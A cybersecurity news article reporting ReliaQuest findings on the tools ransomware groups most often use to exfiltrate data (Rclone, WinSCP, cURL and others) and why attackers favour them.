Threat actors prefer Rclone, WinSCP and cURL as data exfiltration tools

Data exfiltration is critical in dual-threat cyberattacks, which have become the new gold standard for ransomware attacks.

A new report from ReliaQuest finds that Rclone, WinSCP, and Client URL (cURL) are the three most commonly used data exfiltration tools by cybercriminals between September 2023 and July 2024.

Data exfiltration, the unauthorized uploading or downloading of data from corporate or personal devices, can involve infrastructure owned by the threat actor or third-party cloud services.

To do this, attackers typically use legitimate or custom tools that allow them to collect and extract large amounts of data, and then threaten the victim with disclosing the data if they refuse to pay the ransom.

According to ReliaQuest, most of the well-known ransomware groups such as LockBit, Black Basta, and BlackSuit prefer to use the three tools mentioned above.

Others, such as Inc Ransom, prefer to use more unusual tools, such as legitimate file managers and remote monitoring and management (RMM) software.

Best Data Exfiltration Tools

Cloning

Rclone is a legal, open-source command-line tool that allows users to sync files with various cloud storage providers as well as standard infrastructure such as File Transfer Protocol (FTP) servers.

It is also the most popular exfiltration tool used by cybercriminals, with 57% of ransomware incidents involving it during the reporting period.

The appeal of rclone comes from its fast data transfer capabilities and versatility.

For example, Rclone can integrate with a number of cloud services, including Google Drive, Amazon S3, and Mega, as well as protocols like FTP, complicating threat mitigation strategies for security officers.

Rclone also runs on Windows, Linux, and macOS and allows for easy automation of operations, making it very efficient for large data transfers.

“Its legality as a backup tool used by IT professionals helps threat actors avoid detection or raise alarms,” the ReliaQuest report added.

WinSCP

WinSCP is an open source file transfer tool for Windows that offers similar functionality to Rclone but has a user-friendly interface.

While WinSCP focuses on transfers from local to remote locations, Rclone is a command line tool designed to manage files across various cloud storage services.

WinSCP is widely used in organizations and is a trusted, legitimate tool that reduces suspicion when found on an endpoint. Its portability and scripting capabilities facilitate efficient data transfer, both automated and manual. Additionally, WinSCP’s effective error handling and logging features ensure successful exfiltration of specified data.

curl

Client URL (cURL) is a command line tool for transferring data by specifying a destination using a URL.

It supports protocols such as HTTPS, FTP, and SFTP and is commonly used for tasks such as downloading or uploading data and interacting with network services. It is cross-platform and available on Windows, macOS, and Linux.

“cURL is also native to Windows 10 version 1803 and later, meaning attackers don’t need to inject cURL into the target environment, allowing them to ‘live off the land,’” ReliaQuest added.

Compared to Rclone and WinSCP, cURL is not as reliable for large-scale data exfiltration operations. However, it can be a very effective tool for exfiltrating critical information about a target organization.

In May 2024, ReliaQuest observed that the Black Basta ransomware threat actor group leveraged cURL in conjunction with the temp(.)sh cloud storage domain to successfully steal confidential data from organizations.

Other Data Exfiltration Tools

In addition to these three tools, attackers also use other tools to steal data.

These include file storage and transfer tools (MEGA Cloud Storage, FileZilla), backup programs (Restic), and remote monitoring and management software (RMM).

“It is also important to consider tools that allow for the exfiltration of small amounts of data and the persistent threat of non-standard exfiltration tools,” the ReliaQuest researchers concluded.

Read more: Chemical plants warned of possible data leak after CISA breach